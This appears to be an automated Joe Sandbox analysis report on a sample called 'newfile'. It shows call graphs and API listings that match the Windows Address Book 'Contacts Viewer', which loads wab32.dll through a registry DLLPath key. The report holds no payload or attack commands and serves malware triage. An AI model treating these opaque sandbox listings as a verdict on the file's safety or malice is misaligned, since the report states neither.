                                                                            execution_graph 874 5f31bf _XcptFilter 875 5f31d3 876 5f31ee 875->876 877 5f31e7 _exit 875->877 878 5f31f7 _cexit 876->878 879 5f3202 876->879 877->876 878->879 885 5f37c2 886 5f37d3 885->886 889 5f2f51 ResolveDelayLoadedAPI 886->889 888 5f37e0 889->888 647 5f3030 664 5f3675 647->664 649 5f3035 650 5f3046 GetStartupInfoW 649->650 651 5f3063 650->651 652 5f3078 651->652 653 5f307f Sleep 651->653 654 5f3097 _amsg_exit 652->654 656 5f30a1 652->656 653->651 654->656 655 5f30e3 _initterm 660 5f30fe __IsNonwritableInCurrentImage 655->660 656->655 657 5f30c4 656->657 656->660 658 5f31a6 _ismbblead 658->660 659 5f31ee 659->657 661 5f31f7 _cexit 659->661 660->658 660->659 663 5f318e exit 660->663 669 5f1c5c 660->669 661->657 663->660 665 5f369e GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 664->665 666 5f369a 664->666 668 5f36ed 665->668 666->665 667 5f3702 666->667 667->649 668->667 733 5f37f0 669->733 673 5f1d01 HeapSetInformation 674 5f1d20 673->674 708 5f1d18 673->708 737 5f29ab CommandLineToArgvW 674->737 679 5f201a FreeLibrary 680 5f2560 679->680 683 5f256b FreeLibrary 680->683 684 5f2578 680->684 681 5f1d9c GetStockObject RegisterClassW CreateWindowExW 682 5f1e0e 681->682 681->708 751 5f1b83 memset 682->751 683->684 787 5f1ae4 684->787 689 5f1ae4 2 API calls 692 5f259a 689->692 690 5f1e2f 757 5f25d3 memset memset CommandLineToArgvW 690->757 691 5f1e22 GetLastError 691->708 791 5f32b0 692->791 696 5f25a9 696->660 698 5f1eee 699 5f1ef2 EventUnregister 698->699 701 5f1f1f memset LoadStringW MessageBoxW 699->701 702 5f1f6d 699->702 701->708 703 5f1f79 GetProcAddress 702->703 707 5f202e 702->707 703->708 705 5f2036 GetProcAddress 705->708 710 5f204e 705->710 707->705 709 5f208a 707->709 708->679 708->680 709->708 711 5f211c GetProcAddress 709->711 710->708 711->708 712 5f2136 711->712 713 5f218c memset 712->713 717 5f2225 712->717 714 5f21a9 LoadStringW 713->714 714->717 716 5f2384 718 5f238d GetProcAddress 716->718 719 5f242a 716->719 717->716 797 5f1b21 717->797 718->708 728 5f23a5 718->728 721 5f2433 GetProcAddress 719->721 722 5f24d0 719->722 721->708 729 5f244b 721->729 723 5f24d8 GetProcAddress 722->723 725 5f24f0 722->725 723->708 723->725 724 5f2525 GetProcAddress 724->708 726 5f253d 724->726 725->708 725->724 726->680 728->708 730 5f23e2 memset LoadStringW 728->730 729->708 731 5f2488 memset LoadStringW 729->731 730->719 731->722 732 5f233c memset LoadStringW 732->716 734 5f1c6b memset GetCommandLineW 733->734 735 5f1ab0 734->735 736 5f1acb 735->736 736->673 736->736 738 5f29cc 737->738 739 5f1d27 737->739 740 5f29db LocalFree 738->740 743 5f1bf4 739->743 740->739 741 5f29ec 740->741 742 5f2a08 RegisterApplicationRestart 741->742 742->739 801 5f28a4 memset 743->801 746 5f1c4d 749 5f32b0 4 API calls 746->749 747 5f1c28 PathAppendW 747->746 748 5f1c3e LoadLibraryW 747->748 748->746 750 5f1c5a LoadStringW LoadIconW 749->750 750->681 752 5f28a4 10 API calls 751->752 753 5f1bbb 752->753 753->753 754 5f1be1 LoadLibraryW 753->754 755 5f32b0 4 API calls 754->755 756 5f1bf2 755->756 756->690 756->691 758 5f2661 757->758 761 5f2888 757->761 759 5f287d LocalFree 758->759 762 5f2683 StrCmpNIW 758->762 769 5f2676 758->769 759->761 760 5f32b0 4 API calls 763 5f1e43 760->763 761->760 764 5f26f0 762->764 768 5f26a0 762->768 763->708 782 5f193a EventRegister 763->782 765 5f2741 764->765 767 5f2709 PathFindExtensionW 764->767 766 5f2761 StrCmpIW 765->766 765->769 766->765 774 5f2785 766->774 770 5f271e StrCmpIW 767->770 768->769 813 5f1b57 768->813 769->759 770->765 771 5f2730 770->771 771->769 771->770 773 5f27c0 775 5f27d3 GetFileAttributesW 773->775 774->769 774->773 776 5f27e5 775->776 780 5f2833 775->780 777 5f27ee PathRemoveFileSpecW 776->777 778 5f2811 776->778 777->778 779 5f27ff GetFileAttributesW 777->779 778->769 779->778 779->780 780->778 817 5f2b60 780->817 783 5f198b 782->783 784 5f1998 EventSetInformation 782->784 785 5f32b0 4 API calls 783->785 784->783 786 5f19c5 785->786 786->698 786->699 796 5f19c7 EventWriteTransfer 786->796 790 5f1af2 787->790 788 5f1b16 788->689 789 5f1b06 GetProcessHeap HeapFree 789->788 790->788 790->789 790->790 792 5f32bb 791->792 793 5f32b8 791->793 831 5f32c0 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 792->831 793->696 795 5f33f6 795->696 796->698 798 5f1b2e 797->798 799 5f1b4d 797->799 832 5f2c36 798->832 799->708 799->732 802 5f28ee RegOpenKeyExW 801->802 803 5f299d 801->803 805 5f2989 802->805 806 5f2914 RegQueryValueExW 802->806 804 5f32b0 4 API calls 803->804 808 5f1c17 PathRemoveFileSpecW 804->808 805->803 807 5f2991 RegCloseKey 805->807 806->805 809 5f2949 806->809 807->803 808->746 808->747 810 5f296d GetFileAttributesW 809->810 811 5f2958 ExpandEnvironmentStringsW 809->811 810->805 812 5f2979 810->812 811->805 812->805 814 5f1b63 813->814 814->814 815 5f2b60 6 API calls 814->815 816 5f1b7b 815->816 816->769 818 5f2bc7 817->818 819 5f2b74 817->819 818->778 819->818 823 5f2a7e 819->823 822 5f2baa memcpy 822->818 824 5f2a95 823->824 825 5f2a8e 823->825 824->825 826 5f2ac9 GetProcessHeap HeapAlloc 824->826 825->818 825->822 826->825 827 5f2adf 826->827 828 5f2ae5 memcpy 827->828 829 5f2aff 827->829 828->829 829->825 829->829 830 5f2b33 GetProcessHeap HeapFree 829->830 830->825 831->795 833 5f2ce8 832->833 834 5f2c61 832->834 835 5f32b0 4 API calls 833->835 837 5f2a7e 5 API calls 834->837 836 5f2cf7 835->836 836->799 838 5f2c86 837->838 839 5f2cd4 838->839 844 5f2cfb 838->844 841 5f1ae4 2 API calls 839->841 841->833 845 5f2d0a 844->845 846 5f2cae 844->846 845->846 858 5f2ef8 845->858 846->839 852 5f2bd5 846->852 848 5f2d44 memset 848->846 851 5f2d4b memset 851->846 853 5f2c28 852->853 854 5f2be5 852->854 853->839 854->853 855 5f2a7e 5 API calls 854->855 856 5f2c0b 855->856 856->853 857 5f2c11 memcpy 856->857 857->853 859 5f2f07 858->859 859->859 861 5f2d2b 859->861 862 5f2e3f 859->862 861->848 861->851 863 5f2e83 862->863 864 5f2e8f 863->864 865 5f2e9f LocalAlloc 863->865 864->861 865->864 866 5f2eaf 865->866 867 5f2ee8 LocalFree 866->867 870 5f2deb 866->870 867->864 869 5f2eda 869->867 871 5f2df8 870->871 872 5f2e1c 870->872 871->872 873 5f2e06 IsDBCSLeadByte 871->873 872->869 873->871 873->872 880 5f3450 SetUnhandledExceptionFilter 881 5f3790 _except_handler4_common 882 5f25b0 883 5f25be DefWindowProcW 882->883 884 5f25c5 PostQuitMessage 882->884 883->884 890 5f3400 891 5f343d 890->891 893 5f3412 890->893 892 5f3437 ?terminate@ 892->891 893->891 893->892 894 5f2f80 895 5f2f85 894->895 903 5f34d8 GetModuleHandleW 895->903 897 5f2f91 __set_app_type __p__fmode __p__commode 898 5f2fc9 897->898 899 5f2fde 898->899 900 5f2fd2 __setusermatherr 898->900 905 5f370d _controlfp 899->905 900->899 902 5f2fe3 904 5f34e9 903->904 904->897 905->902

                                                                            Callgraph

                                                                            • Executed
                                                                            • Not Executed
                                                                            • Opacity -> Relevance
                                                                            • Disassembly available
                                                                            callgraph 0 Function_005F1C5C 4 Function_005F25D3 0->4 9 Function_005F19C7 0->9 19 Function_005F1BF4 0->19 20 Function_005F37F0 0->20 23 Function_005F1AE4 0->23 32 Function_005F1B83 0->32 40 Function_005F193A 0->40 45 Function_005F1AB0 0->45 46 Function_005F32B0 0->46 50 Function_005F29AB 0->50 54 Function_005F1B21 0->54 1 Function_005F34D8 24 Function_005F3464 1->24 2 Function_005F1B57 25 Function_005F2B60 2->25 3 Function_005F2BD5 14 Function_005F2A7E 3->14 4->2 4->25 26 Function_005F1A60 4->26 4->46 5 Function_005F31D3 6 Function_005F2F51 7 Function_005F3450 8 Function_005F324A 10 Function_005F37C2 10->6 11 Function_005F32C0 12 Function_005F3640 13 Function_005F2D7F 15 Function_005F2CFB 16 Function_005F2EF8 15->16 38 Function_005F2E3F 16->38 17 Function_005F13F8 18 Function_005F3675 19->46 52 Function_005F28A4 19->52 21 Function_005F376D 22 Function_005F2DEB 51 Function_005F3728 24->51 25->14 27 Function_005F361E 28 Function_005F3219 29 Function_005F3790 30 Function_005F370D 31 Function_005F360B 32->46 32->52 33 Function_005F3001 34 Function_005F3580 34->12 47 Function_005F3530 34->47 35 Function_005F3400 36 Function_005F1B80 37 Function_005F2F80 37->1 37->8 37->30 55 Function_005F3520 37->55 38->13 38->22 39 Function_005F31BF 40->46 41 Function_005F2C36 41->3 41->14 41->15 41->23 41->45 41->46 42 Function_005F34B5 43 Function_005F34B1 44 Function_005F3030 44->0 44->18 44->28 44->34 44->51 46->11 48 Function_005F18B0 49 Function_005F25B0 53 Function_005F2A21 50->53 52->26 52->46 54->41

                                                                            Executed Functions

                                                                            Function 005F1C5C Relevance: 63.6, APIs: 31, Strings: 5, Instructions: 637registrymemorywindowCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 0 5f1c5c-5f1d16 call 5f37f0 memset GetCommandLineW call 5f1ab0 HeapSetInformation 5 5f1d18-5f1d1b 0->5 6 5f1d20-5f1e08 call 5f29ab call 5f1bf4 LoadStringW LoadIconW GetStockObject RegisterClassW CreateWindowExW 0->6 7 5f1faf 5->7 6->7 24 5f1e0e-5f1e20 call 5f1b83 6->24 10 5f1fb1-5f1fb9 7->10 12 5f1fde-5f1fe6 10->12 13 5f1fbb-5f1fd5 10->13 14 5f200d-5f2014 12->14 15 5f1fe8-5f2004 12->15 13->12 27 5f1fd7-5f1fdc 13->27 17 5f201a-5f2029 FreeLibrary 14->17 18 5f2560 14->18 15->14 32 5f2006-5f200b 15->32 22 5f2562-5f2569 17->22 18->22 25 5f256b-5f2572 FreeLibrary 22->25 26 5f2578-5f25aa call 5f1ae4 * 2 call 5f32b0 22->26 35 5f1e2f-5f1e45 call 5f25d3 24->35 36 5f1e22 GetLastError 24->36 25->26 27->12 32->14 35->7 43 5f1e4b-5f1e62 call 5f193a 35->43 37 5f1e28-5f1e2a 36->37 37->7 46 5f1e68-5f1e76 43->46 47 5f1ef0 43->47 48 5f1e78-5f1e88 46->48 49 5f1ef2-5f1f1d EventUnregister 46->49 47->49 48->49 50 5f1e8a-5f1e8c 48->50 51 5f1f1f-5f1f62 memset LoadStringW MessageBoxW 49->51 52 5f1f6d-5f1f73 49->52 50->49 56 5f1e8e-5f1eee call 5f19c7 50->56 53 5f1f68-5f1f6b 51->53 54 5f202e-5f2034 52->54 55 5f1f79-5f1f8b GetProcAddress 52->55 53->10 60 5f206a-5f2070 54->60 61 5f2036 54->61 57 5f1f8d-5f1f95 55->57 58 5f1fac-5f1fae 55->58 56->49 73 5f1f99-5f1f9b 57->73 58->7 62 5f2076-5f207c 60->62 63 5f2072-5f2074 60->63 65 5f2038-5f2048 GetProcAddress 61->65 67 5f207e-5f2080 62->67 68 5f2082-5f2084 62->68 63->65 65->58 69 5f204e-5f205c 65->69 67->65 70 5f208a-5f2098 68->70 71 5f2086-5f2088 68->71 88 5f205e-5f2063 69->88 89 5f2065 69->89 74 5f209a-5f20a1 70->74 75 5f20b3-5f20b9 70->75 71->65 78 5f1f9d-5f1fa2 73->78 79 5f1fa4-5f1fa6 73->79 80 5f20ab-5f20b1 74->80 81 5f20a3-5f20a9 74->81 76 5f20bb-5f20c2 75->76 77 5f20d4-5f20da 75->77 83 5f20cc-5f20d2 76->83 84 5f20c4-5f20ca 76->84 86 5f20dc-5f20e3 77->86 87 5f20f5-5f20fd 77->87 78->79 79->37 79->58 82 5f210f-5f2116 80->82 81->82 82->53 93 5f211c-5f2130 GetProcAddress 82->93 83->82 84->82 90 5f20ed-5f20f3 86->90 91 5f20e5-5f20eb 86->91 87->82 92 5f20ff-5f2109 87->92 88->89 89->58 90->82 91->82 92->82 93->53 94 5f2136-5f2179 93->94 97 5f217b-5f2180 94->97 98 5f2182-5f2186 94->98 97->98 99 5f218c-5f21a7 memset 98->99 100 5f2225-5f2228 98->100 101 5f21ec 99->101 102 5f21a9-5f21af 99->102 103 5f222a-5f2247 100->103 104 5f2251-5f2254 100->104 109 5f21f1-5f221a LoadStringW 101->109 105 5f21e5-5f21ea 102->105 106 5f21b1-5f21b7 102->106 122 5f224a 103->122 107 5f2256-5f227f 104->107 108 5f2281-5f2284 104->108 105->109 111 5f21de-5f21e3 106->111 112 5f21b9-5f21bf 106->112 107->122 113 5f22c7-5f22ca 108->113 114 5f2286-5f2291 108->114 109->100 111->109 117 5f21d7-5f21dc 112->117 118 5f21c1-5f21d5 112->118 115 5f2384-5f2387 113->115 116 5f22d0-5f22e4 call 5f1b21 113->116 120 5f2299-5f22c5 114->120 121 5f2293 114->121 123 5f238d-5f239f GetProcAddress 115->123 124 5f242a-5f242d 115->124 116->53 133 5f22ea-5f22f5 116->133 117->109 118->109 120->122 121->120 122->104 123->58 129 5f23a5-5f23c6 123->129 126 5f2433-5f2445 GetProcAddress 124->126 127 5f24d0-5f24d6 124->127 126->58 132 5f244b-5f246c 126->132 134 5f2519-5f251f 127->134 135 5f24d8-5f24ea GetProcAddress 127->135 149 5f23cf-5f23d1 129->149 150 5f23c8-5f23cd 129->150 152 5f246e-5f2473 132->152 153 5f2475-5f2477 132->153 139 5f22fd-5f2320 133->139 140 5f22f7 133->140 134->53 137 5f2525-5f2537 GetProcAddress 134->137 135->58 141 5f24f0-5f2514 135->141 137->58 143 5f253d-5f255b 137->143 159 5f2329-5f232b 139->159 160 5f2322-5f2327 139->160 140->139 141->134 143->18 149->58 154 5f23d7-5f23dc 149->154 150->149 152->153 153->58 156 5f247d-5f2482 153->156 154->58 158 5f23e2-5f241f memset LoadStringW 154->158 156->58 162 5f2488-5f24c5 memset LoadStringW 156->162 158->124 159->58 161 5f2331-5f2336 159->161 160->159 161->58 163 5f233c-5f2379 memset LoadStringW 161->163 162->127 163->115
                                                                            APIs
                                                                            • memset.MSVCRT ref: 005F1CC6
                                                                            • GetCommandLineW.KERNEL32 ref: 005F1CCE
                                                                            • HeapSetInformation.KERNEL32(00000000,00000001,00000000,00000000,?), ref: 005F1D0E
                                                                            • LoadStringW.USER32(00000000,000007D1,?,00000104), ref: 005F1D49
                                                                            • LoadIconW.USER32 ref: 005F1D84
                                                                            • LoadCursorW.USER32(00000000,00007F00), ref: 005F1D96
                                                                            • GetStockObject.GDI32(00000000), ref: 005F1DA3
                                                                            • RegisterClassW.USER32(00000003), ref: 005F1DCD
                                                                            • CreateWindowExW.USER32(00000000,Contacts Viewer,?,00CF0000,00000000,00000000,0000012C,000000C8,00000000,00000000,00000000), ref: 005F1DF8
                                                                            • GetLastError.KERNEL32 ref: 005F1E22
                                                                            • FreeLibrary.KERNELBASE(?), ref: 005F201B
                                                                            • FreeLibrary.KERNELBASE(?), ref: 005F256C
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000016.00000002.1972097534.00000000005F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005F0000, based on PE: true
                                                                            • Associated: 00000016.00000002.1972008473.00000000005F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000016.00000002.1972136151.00000000005F5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000016.00000002.1972136151.00000000005F7000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000016.00000002.1972136151.000000000060D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_22_2_5f0000_newfile.jbxd
                                                                            Similarity
                                                                            • API ID: Load$FreeLibrary$ClassCommandCreateCursorErrorHeapIconInformationLastLineObjectRegisterStockStringWindowmemset
                                                                            • String ID: $API Entered$Contacts Viewer$WABOpen$(=u
                                                                            • API String ID: 328653217-4017187306
                                                                            • Opcode ID: e38c6b0da74b47b495c85f31d37b1b557d35df409f03663f9ae865e9355b77c7
                                                                            • Instruction ID: 2ddcfeb9f38256e6c155306202269762adf037d5b4383f5cd2e3d6000dc6131f
                                                                            • Opcode Fuzzy Hash: e38c6b0da74b47b495c85f31d37b1b557d35df409f03663f9ae865e9355b77c7
                                                                            • Instruction Fuzzy Hash: 853292B594061DDBDB248B14DC89BFA7BB9BB94300F1400A9EB09E72A0DB7C9D84DF54
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 005F3030 Relevance: 13.6, APIs: 9, Instructions: 144sleepCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 164 5f3030-5f3061 call 5f3675 call 5f3728 GetStartupInfoW 170 5f3063-5f3072 164->170 171 5f308c-5f308e 170->171 172 5f3074-5f3076 170->172 173 5f308f-5f3095 171->173 174 5f307f-5f308a Sleep 172->174 175 5f3078-5f307d 172->175 176 5f3097-5f309f _amsg_exit 173->176 177 5f30a1-5f30a7 173->177 174->170 175->173 178 5f30db-5f30e1 176->178 179 5f30a9-5f30c2 call 5f3219 177->179 180 5f30d5 177->180 182 5f30fe-5f3100 178->182 183 5f30e3-5f30f4 _initterm 178->183 179->178 187 5f30c4-5f30d0 179->187 180->178 185 5f310b-5f3112 182->185 186 5f3102-5f3109 182->186 183->182 188 5f3137-5f3141 185->188 189 5f3114-5f3121 call 5f3580 185->189 186->185 191 5f3209-5f3218 187->191 190 5f3144-5f3149 188->190 189->188 196 5f3123-5f3135 189->196 193 5f314b-5f314d 190->193 194 5f3195-5f3198 190->194 199 5f314f-5f3151 193->199 200 5f3164-5f3168 193->200 197 5f319a-5f31a3 194->197 198 5f31a6-5f31b3 _ismbblead 194->198 196->188 197->198 201 5f31b9-5f31bd 198->201 202 5f31b5-5f31b6 198->202 199->194 203 5f3153-5f3155 199->203 204 5f316a-5f316e 200->204 205 5f3170-5f3172 200->205 201->190 207 5f31ee-5f31f5 201->207 202->201 203->200 208 5f3157-5f315a 203->208 209 5f3173-5f318c call 5f1c5c 204->209 205->209 210 5f31f7-5f31fd _cexit 207->210 211 5f3202 207->211 208->200 212 5f315c-5f3162 208->212 209->207 215 5f318e-5f318f exit 209->215 210->211 211->191 212->203 215->194
                                                                            APIs
                                                                              • Part of subcall function 005F3675: GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 005F36A2
                                                                              • Part of subcall function 005F3675: GetCurrentProcessId.KERNEL32 ref: 005F36B1
                                                                              • Part of subcall function 005F3675: GetCurrentThreadId.KERNEL32 ref: 005F36BA
                                                                              • Part of subcall function 005F3675: GetTickCount.KERNEL32 ref: 005F36C3
                                                                              • Part of subcall function 005F3675: QueryPerformanceCounter.KERNEL32(?), ref: 005F36D8
                                                                            • GetStartupInfoW.KERNEL32(?,005F3838,00000058), ref: 005F304F
                                                                            • Sleep.KERNEL32(000003E8), ref: 005F3084
                                                                            • _amsg_exit.MSVCRT ref: 005F3099
                                                                            • _initterm.MSVCRT ref: 005F30ED
                                                                            • __IsNonwritableInCurrentImage.LIBCMT ref: 005F3119
                                                                            • exit.KERNELBASE ref: 005F318F
                                                                            • _ismbblead.MSVCRT ref: 005F31AA
                                                                            Memory Dump Source
                                                                            • Source File: 00000016.00000002.1972097534.00000000005F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005F0000, based on PE: true
                                                                            • Associated: 00000016.00000002.1972008473.00000000005F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000016.00000002.1972136151.00000000005F5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000016.00000002.1972136151.00000000005F7000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000016.00000002.1972136151.000000000060D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_22_2_5f0000_newfile.jbxd
                                                                            Similarity
                                                                            • API ID: Current$Time$CountCounterFileImageInfoNonwritablePerformanceProcessQuerySleepStartupSystemThreadTick_amsg_exit_initterm_ismbbleadexit
                                                                            • String ID:
                                                                            • API String ID: 836923961-0
                                                                            • Opcode ID: a49aaa0e0fb5ae64b33187a31d2cd60cf8a25f29b2a8f139337eb8d6a5966031
                                                                            • Instruction ID: 538df5f60a98c304830b9b1283719a34dc5ec8fb7e26ee7d1f6dd25bb2eb9a0c
                                                                            • Opcode Fuzzy Hash: a49aaa0e0fb5ae64b33187a31d2cd60cf8a25f29b2a8f139337eb8d6a5966031
                                                                            • Instruction Fuzzy Hash: 7E41C17594471DDBEB219B54D809B7ABFE8FB54720F20042AEB42D7290DF7C8A84DB80
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 005F28A4 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 76registryCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 216 5f28a4-5f28e8 memset 217 5f28ee-5f2912 RegOpenKeyExW 216->217 218 5f299d-5f29aa call 5f32b0 216->218 220 5f2989-5f298f 217->220 221 5f2914-5f2947 RegQueryValueExW 217->221 220->218 222 5f2991-5f2997 RegCloseKey 220->222 221->220 224 5f2949-5f2956 221->224 222->218 225 5f296d-5f2977 GetFileAttributesW 224->225 226 5f2958-5f296b ExpandEnvironmentStringsW 224->226 225->220 227 5f2979-5f2984 call 5f1a60 225->227 226->220 227->220
                                                                            APIs
                                                                            • memset.MSVCRT ref: 005F28DE
                                                                            • RegOpenKeyExW.KERNELBASE(80000002,Software\Microsoft\WAB\DLLPath,00000000,00020019,?,?,00000000,00000000), ref: 005F290A
                                                                            • RegQueryValueExW.KERNELBASE(?,005F11FC,00000000,?,?,?,?,00000000,00000000), ref: 005F293F
                                                                            • ExpandEnvironmentStringsW.KERNEL32(?,?,00000104,?,00000000,00000000), ref: 005F295F
                                                                            • GetFileAttributesW.KERNEL32(?,?,00000000,00000000), ref: 005F296E
                                                                            • RegCloseKey.KERNELBASE(?,?,00000000,00000000), ref: 005F2997
                                                                            Strings
                                                                            • Software\Microsoft\WAB\DLLPath, xrefs: 005F2900
                                                                            Memory Dump Source
                                                                            • Source File: 00000016.00000002.1972097534.00000000005F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005F0000, based on PE: true
                                                                            • Associated: 00000016.00000002.1972008473.00000000005F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000016.00000002.1972136151.00000000005F5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000016.00000002.1972136151.00000000005F7000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000016.00000002.1972136151.000000000060D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_22_2_5f0000_newfile.jbxd
                                                                            Similarity
                                                                            • API ID: AttributesCloseEnvironmentExpandFileOpenQueryStringsValuememset
                                                                            • String ID: Software\Microsoft\WAB\DLLPath
                                                                            • API String ID: 2763597636-3156921957
                                                                            • Opcode ID: f7fa21d3261a4b70e8a94f82ab9894914195922991074286f777e0cbd29e185c
                                                                            • Instruction ID: 93eefcce8eb0d6bace34e7693a480338bae74319cd31a34fb4318175a1da8cad
                                                                            • Opcode Fuzzy Hash: f7fa21d3261a4b70e8a94f82ab9894914195922991074286f777e0cbd29e185c
                                                                            • Instruction Fuzzy Hash: B52197B194121CAADB209B50CD4CEFBBBBCBF54710F000295A619E3150EB744BC4CEA0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 005F1BF4 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 33libraryCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 229 5f1bf4-5f1c26 call 5f28a4 PathRemoveFileSpecW 232 5f1c4d-5f1c5b call 5f32b0 229->232 233 5f1c28-5f1c3c PathAppendW 229->233 233->232 234 5f1c3e-5f1c4b LoadLibraryW 233->234 234->232
                                                                            APIs
                                                                              • Part of subcall function 005F28A4: memset.MSVCRT ref: 005F28DE
                                                                              • Part of subcall function 005F28A4: RegOpenKeyExW.KERNELBASE(80000002,Software\Microsoft\WAB\DLLPath,00000000,00020019,?,?,00000000,00000000), ref: 005F290A
                                                                              • Part of subcall function 005F28A4: RegQueryValueExW.KERNELBASE(?,005F11FC,00000000,?,?,?,?,00000000,00000000), ref: 005F293F
                                                                              • Part of subcall function 005F28A4: ExpandEnvironmentStringsW.KERNEL32(?,?,00000104,?,00000000,00000000), ref: 005F295F
                                                                              • Part of subcall function 005F28A4: RegCloseKey.KERNELBASE(?,?,00000000,00000000), ref: 005F2997
                                                                            • PathRemoveFileSpecW.SHLWAPI(?,?), ref: 005F1C1E
                                                                            • PathAppendW.SHLWAPI(?,wab32res.dll), ref: 005F1C34
                                                                            • LoadLibraryW.KERNELBASE(?), ref: 005F1C45
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000016.00000002.1972097534.00000000005F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005F0000, based on PE: true
                                                                            • Associated: 00000016.00000002.1972008473.00000000005F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000016.00000002.1972136151.00000000005F5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000016.00000002.1972136151.00000000005F7000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000016.00000002.1972136151.000000000060D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_22_2_5f0000_newfile.jbxd
                                                                            Similarity
                                                                            • API ID: Path$AppendCloseEnvironmentExpandFileLibraryLoadOpenQueryRemoveSpecStringsValuememset
                                                                            • String ID: wab32res.dll
                                                                            • API String ID: 1705514897-2698570859
                                                                            • Opcode ID: 50144f714c26c0b021701703795e33dcb1dfd08fd3a393854562928d7a56d9c0
                                                                            • Instruction ID: d640dd202892dafdbecb46633234992015dee39ad54c036c06179a50c6b48ec3
                                                                            • Opcode Fuzzy Hash: 50144f714c26c0b021701703795e33dcb1dfd08fd3a393854562928d7a56d9c0
                                                                            • Instruction Fuzzy Hash: 05F03075A0261CEBCB10EBB4DC4DABE7BBCBB54740F504195A611D7141EF38DE08CA94
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 005F1B83 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36libraryCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 237 5f1b83-5f1bc1 memset call 5f28a4 240 5f1bc4-5f1bcd 237->240 240->240 241 5f1bcf-5f1bda 240->241 242 5f1bdc 241->242 243 5f1be1-5f1bf3 LoadLibraryW call 5f32b0 241->243 242->243
                                                                            APIs
                                                                            • memset.MSVCRT ref: 005F1BA8
                                                                              • Part of subcall function 005F28A4: memset.MSVCRT ref: 005F28DE
                                                                              • Part of subcall function 005F28A4: RegOpenKeyExW.KERNELBASE(80000002,Software\Microsoft\WAB\DLLPath,00000000,00020019,?,?,00000000,00000000), ref: 005F290A
                                                                              • Part of subcall function 005F28A4: RegQueryValueExW.KERNELBASE(?,005F11FC,00000000,?,?,?,?,00000000,00000000), ref: 005F293F
                                                                              • Part of subcall function 005F28A4: ExpandEnvironmentStringsW.KERNEL32(?,?,00000104,?,00000000,00000000), ref: 005F295F
                                                                              • Part of subcall function 005F28A4: RegCloseKey.KERNELBASE(?,?,00000000,00000000), ref: 005F2997
                                                                            • LoadLibraryW.KERNELBASE(?,?,00000000), ref: 005F1BE2
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000016.00000002.1972097534.00000000005F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005F0000, based on PE: true
                                                                            • Associated: 00000016.00000002.1972008473.00000000005F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000016.00000002.1972136151.00000000005F5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000016.00000002.1972136151.00000000005F7000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000016.00000002.1972136151.000000000060D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_22_2_5f0000_newfile.jbxd
                                                                            Similarity
                                                                            • API ID: memset$CloseEnvironmentExpandLibraryLoadOpenQueryStringsValue
                                                                            • String ID: wab32.dll
                                                                            • API String ID: 2792020168-2849205143
                                                                            • Opcode ID: a91c4b1861e6253a4b27bc02533123cd993b948a03530a10b11f74087e39e442
                                                                            • Instruction ID: b4d375630cf479ed21cab1f13766a7526b64aee853e7cae267096266f9d61dc7
                                                                            • Opcode Fuzzy Hash: a91c4b1861e6253a4b27bc02533123cd993b948a03530a10b11f74087e39e442
                                                                            • Instruction Fuzzy Hash: A1F0F67580121C97CB24EB68DC4E9FA7BB8FF50340FA04194AA16D7181EA389F49CA84
